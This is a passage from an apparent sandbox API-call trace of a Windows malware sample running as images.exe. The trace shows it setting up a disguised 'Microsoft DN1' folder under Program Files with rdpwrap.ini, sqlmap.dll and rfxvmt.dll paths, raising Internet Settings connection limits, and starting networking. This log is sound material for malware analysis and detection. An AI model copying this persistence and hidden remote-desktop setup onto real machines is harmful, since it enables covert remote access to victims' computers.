(lpString="%windir%\\System32") returned 17 [0267.747] lstrcpyW (in: lpString1=0x2300000, lpString2="%windir%\\System32" | out: lpString1="%windir%\\System32") returned="%windir%\\System32" [0267.747] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32", lpDst=0xa0fb00, nSize=0x1ff | out: lpDst="C:\\Windows\\System32") returned 0x14 [0267.747] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0267.747] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2dc0000 [0267.748] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0267.748] lstrcpyW (in: lpString1=0x2dc0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0267.748] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0267.748] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0267.748] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0267.748] VirtualFree (lpAddress=0x2dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.749] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.749] GetCurrentProcess () returned 0xffffffff [0267.749] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0267.749] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0267.749] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xa0fef0 | out: Wow64Process=0xa0fef0*=1) returned 1 [0267.749] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.750] lstrlenW (lpString="%ProgramW6432%") returned 14 [0267.750] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.751] lstrlenW (lpString="%ProgramW6432%") returned 14 [0267.751] lstrcpyW (in: lpString1=0x2300000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0267.751] lstrlenW (lpString="%ProgramW6432%") returned 14 [0267.751] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0267.752] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0267.752] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.753] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0xa0fb00, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0267.753] lstrlenW (lpString="C:\\Program Files") returned 16 [0267.753] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.753] lstrlenW (lpString="C:\\Program Files") returned 16 [0267.753] lstrcpyW (in: lpString1=0x2300000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0267.753] lstrlenW (lpString="C:\\Program Files") returned 16 [0267.754] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2dc0000 [0267.754] lstrcpyW (in: lpString1=0x2dc0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0267.754] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.755] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.756] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.756] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.756] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.757] lstrcpyW (in: lpString1=0x2300000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0267.757] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.757] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0267.757] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0267.758] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.759] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.759] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.759] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.759] lstrcpyW (in: lpString1=0x2300000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0267.759] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.760] lstrlenW (lpString="C:\\Program Files") returned 16 [0267.760] VirtualQuery (in: lpAddress=0x2dc0000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x2dc0000, AllocationBase=0x2dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.760] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0267.760] VirtualFree (lpAddress=0x2dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.761] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0267.761] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.762] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.762] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.762] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.762] lstrcpyW (in: lpString1=0x2300000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0267.762] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0267.763] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.763] VirtualQuery (in: lpAddress=0x2320000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x2320000, AllocationBase=0x2320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.763] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x2dc0000 [0267.763] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.764] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0267.764] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.765] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0267.765] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.765] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0267.765] lstrcpyW (in: lpString1=0x2300000, lpString2="\\rfxvmt.dll" | out: lpString1="\\rfxvmt.dll") returned="\\rfxvmt.dll" [0267.765] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0267.765] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0267.765] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.766] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0267.766] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.767] lstrcatW (in: lpString1="C:\\Windows\\System32", lpString2="\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0267.767] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.768] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0267.774] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0267.774] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.775] lstrcpyW (in: lpString1=0x2300000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0267.775] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0267.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0267.775] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0267.775] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0267.775] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0267.775] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0267.775] VirtualQuery (in: lpAddress=0x2300000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x2300000, AllocationBase=0x2300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.775] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x31f0000 [0267.776] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.776] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0267.776] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.777] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.777] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.777] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.777] lstrcpyW (in: lpString1=0x2300000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0267.777] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.777] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0267.777] VirtualQuery (in: lpAddress=0x31e0000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x31e0000, AllocationBase=0x31e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.777] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0267.778] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.778] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0267.778] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.779] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.779] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.779] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.779] lstrcpyW (in: lpString1=0x2300000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0267.779] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0267.780] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0267.780] VirtualQuery (in: lpAddress=0x2dc0000, lpBuffer=0xa0fea4, dwLength=0x1c | out: lpBuffer=0xa0fea4*(BaseAddress=0x2dc0000, AllocationBase=0x2dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.780] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0267.780] VirtualFree (lpAddress=0x2dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.780] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0267.780] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.781] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.781] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x28c [0267.781] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x22ddba4 | out: lpWSAData=0x22ddba4) returned 0 [0267.786] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2dc0000 [0267.787] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2a4 [0267.787] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x22ddd84 | out: lpWSAData=0x22ddd84) returned 0 [0267.787] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2a8 [0267.787] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0267.787] GetTickCount () returned 0x17172 [0267.787] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xa0f9d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0267.787] GetProcessHeap () returned 0x710000 [0267.787] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x400000) returned 0x3206020 [0267.797] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0267.797] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0267.798] ReadFile (in: hFile=0x2ac, lpBuffer=0x3206020, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0xa0f8c4, lpOverlapped=0x0 | out: lpBuffer=0x3206020*, lpNumberOfBytesRead=0xa0f8c4*=0x36600, lpOverlapped=0x0) returned 1 [0267.804] CloseHandle (hObject=0x2ac) returned 1 [0267.805] GetProcessHeap () returned 0x710000 [0267.805] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20) returned 0x731118 [0267.805] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="ñ\x0e\x965") returned 0x2ac [0267.805] GetLastError () returned 0x0 [0267.805] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0xa0f8e0, lpdwDisposition=0xa0f8f4 | out: phkResult=0xa0f8e0*=0x2b0, lpdwDisposition=0xa0f8f4*=0x2) returned 0x0 [0267.805] RegSetValueExA (in: hKey=0x2b0, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0xa0f8ec*=0xa, cbData=0x4 | out: lpData=0xa0f8ec*=0xa) returned 0x0 [0267.805] RegSetValueExA (in: hKey=0x2b0, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0xa0f8ec*=0xa, cbData=0x4 | out: lpData=0xa0f8ec*=0xa) returned 0x0 [0267.805] RegCloseKey (hKey=0x2b0) returned 0x0 [0267.805] Sleep (dwMilliseconds=0x1f4) [0268.323] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2b0 [0268.323] GetProcessHeap () returned 0x710000 [0268.323] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xf4) returned 0x7499b8 [0268.323] GetProcessHeap () returned 0x710000 [0268.323] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400) returned 0x749ab8 [0268.323] GetProcessHeap () returned 0x710000 [0268.323] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x13000) returned 0x749ec0 [0268.324] GetProcessHeap () returned 0x710000 [0268.324] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x13000) returned 0x75cec8 [0268.326] GetProcessHeap () returned 0x710000 [0268.327] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x749ec0 | out: hHeap=0x710000) returned 1 [0268.327] GetProcessHeap () returned 0x710000 [0268.327] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4a00) returned 0x76fed0 [0268.327] GetProcessHeap () returned 0x710000 [0268.327] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4a00) returned 0x7372a0 [0268.327] GetProcessHeap () returned 0x710000 [0268.328] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76fed0 | out: hHeap=0x710000) returned 1 [0268.328] GetProcessHeap () returned 0x710000 [0268.328] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x600) returned 0x76fed0 [0268.328] GetProcessHeap () returned 0x710000 [0268.328] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x600) returned 0x7704d8 [0268.328] GetProcessHeap () returned 0x710000 [0268.328] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76fed0 | out: hHeap=0x710000) returned 1 [0268.328] GetProcessHeap () returned 0x710000 [0268.328] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2e00) returned 0x770ae0 [0268.329] GetProcessHeap () returned 0x710000 [0268.329] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2e00) returned 0x73bca8 [0268.329] GetProcessHeap () returned 0x710000 [0268.329] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x770ae0 | out: hHeap=0x710000) returned 1 [0268.329] GetProcessHeap () returned 0x710000 [0268.329] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1000) returned 0x73eab0 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1000) returned 0x73fab8 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x73eab0 | out: hHeap=0x710000) returned 1 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x76fed0 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x5a4) returned 0x73eab0 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x13000) returned 0x749ec0 [0268.330] GetProcessHeap () returned 0x710000 [0268.330] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4a00) returned 0x770ae0 [0268.331] GetProcessHeap () returned 0x710000 [0268.331] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x600) returned 0x73f060 [0268.331] GetProcessHeap () returned 0x710000 [0268.331] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2e00) returned 0x7754e8 [0268.331] GetProcessHeap () returned 0x710000 [0268.331] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1000) returned 0x740ac0 [0268.331] GetProcessHeap () returned 0x710000 [0268.332] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x73fab8 | out: hHeap=0x710000) returned 1 [0268.332] GetProcessHeap () returned 0x710000 [0268.332] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x73bca8 | out: hHeap=0x710000) returned 1 [0268.332] GetProcessHeap () returned 0x710000 [0268.333] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7704d8 | out: hHeap=0x710000) returned 1 [0268.333] GetProcessHeap () returned 0x710000 [0268.333] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7372a0 | out: hHeap=0x710000) returned 1 [0268.333] GetProcessHeap () returned 0x710000 [0268.334] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x75cec8 | out: hHeap=0x710000) returned 1 [0268.336] GetProcessHeap () returned 0x710000 [0268.336] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x7700d8 [0268.336] GetProcessHeap () returned 0x710000 [0268.336] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76fed0 | out: hHeap=0x710000) returned 1 [0268.339] lstrlenA (lpString=".bss") returned 4 [0268.339] lstrlenA (lpString=".bss") returned 4 [0268.339] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0268.340] lstrcpyA (in: lpString1=0x3610000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0268.340] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.340] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.340] GetProcessHeap () returned 0x710000 [0268.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x13000) returned 0x75cec8 [0268.341] lstrlenA (lpString=".text") returned 5 [0268.341] lstrlenA (lpString=".text") returned 5 [0268.341] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.342] lstrcpyA (in: lpString1=0x3620000, lpString2=".text" | out: lpString1=".text") returned=".text" [0268.342] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0268.342] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.343] GetProcessHeap () returned 0x710000 [0268.344] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x75cec8 | out: hHeap=0x710000) returned 1 [0268.344] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.344] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.344] GetProcessHeap () returned 0x710000 [0268.344] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4a00) returned 0x7372a0 [0268.345] lstrlenA (lpString=".rdata") returned 6 [0268.345] lstrlenA (lpString=".rdata") returned 6 [0268.345] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.345] lstrcpyA (in: lpString1=0x3620000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0268.345] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0268.345] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.346] GetProcessHeap () returned 0x710000 [0268.347] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7372a0 | out: hHeap=0x710000) returned 1 [0268.347] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.347] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.347] GetProcessHeap () returned 0x710000 [0268.347] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x600) returned 0x7702e0 [0268.347] lstrlenA (lpString=".data") returned 5 [0268.347] lstrlenA (lpString=".data") returned 5 [0268.347] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.347] lstrcpyA (in: lpString1=0x3620000, lpString2=".data" | out: lpString1=".data") returned=".data" [0268.348] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0268.348] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.348] GetProcessHeap () returned 0x710000 [0268.348] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7702e0 | out: hHeap=0x710000) returned 1 [0268.349] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.349] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.349] GetProcessHeap () returned 0x710000 [0268.349] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2e00) returned 0x7372a0 [0268.349] lstrlenA (lpString=".rsrc") returned 5 [0268.349] lstrlenA (lpString=".rsrc") returned 5 [0268.349] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.350] lstrcpyA (in: lpString1=0x3620000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0268.350] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0268.350] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.350] GetProcessHeap () returned 0x710000 [0268.351] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7372a0 | out: hHeap=0x710000) returned 1 [0268.351] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.351] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.351] GetProcessHeap () returned 0x710000 [0268.351] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1000) returned 0x741ac8 [0268.351] lstrlenA (lpString=".reloc") returned 6 [0268.351] lstrlenA (lpString=".reloc") returned 6 [0268.351] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.352] lstrcpyA (in: lpString1=0x3620000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0268.352] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0268.352] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.352] GetProcessHeap () returned 0x710000 [0268.353] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x741ac8 | out: hHeap=0x710000) returned 1 [0268.353] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.353] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.353] GetProcessHeap () returned 0x710000 [0268.356] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x7702e0 [0268.356] lstrlenA (lpString=".bss") returned 4 [0268.356] lstrlenA (lpString=".bss") returned 4 [0268.356] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.357] lstrcpyA (in: lpString1=0x3620000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0268.357] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0268.357] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.358] GetProcessHeap () returned 0x710000 [0268.359] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7702e0 | out: hHeap=0x710000) returned 1 [0268.359] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0268.359] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0268.359] GetProcessHeap () returned 0x710000 [0268.360] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x7702e0 [0268.360] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.361] GetProcessHeap () returned 0x710000 [0268.361] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x7704e8 [0268.361] GetProcessHeap () returned 0x710000 [0268.361] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x7706f0 [0268.361] GetProcessHeap () returned 0x710000 [0268.361] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7704e8 | out: hHeap=0x710000) returned 1 [0268.361] GetProcessHeap () returned 0x710000 [0268.361] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1ca) returned 0x7708f8 [0268.361] GetProcessHeap () returned 0x710000 